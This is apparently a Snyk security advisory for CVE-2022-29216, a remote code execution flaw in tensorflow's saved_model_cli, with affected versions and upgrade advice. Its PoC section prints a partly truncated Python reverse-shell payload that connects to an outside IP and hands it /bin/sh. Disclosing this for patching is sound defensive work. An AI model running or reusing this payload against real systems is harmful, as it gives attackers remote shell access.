Remote Code Execution (RCE) Affecting tensorflow package, versions [,2.6.4) [2.7.0,2.7.2) [2.8.0,2.8.1) [2.9.0rc0, 2.9.0)
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.1% (42nd
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-TENSORFLOW-2841408
- published 22 May 2022
- disclosed 22 May 2022
- credit Andey Robins
Introduced: 22 May 2022
CVE-2022-29216 Open this link in a new tabHow to fix?
Upgrade tensorflow
to version 2.6.4, 2.7.2, 2.8.1, 2.9.0 or higher.
Overview
tensorflow is a machine learning framework.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to improper fix of CVE-2021-41228. Exploiting this vulnerability is possible via the saved_model_cli
tool and can be abused to open a reverse shell.
PoC:
subprocess\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(("10.0.2.143",33419))\nsubprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())""")'
--dir ./ --tag_set serve --signature_def serving_default
CVSS Scores
version 3.1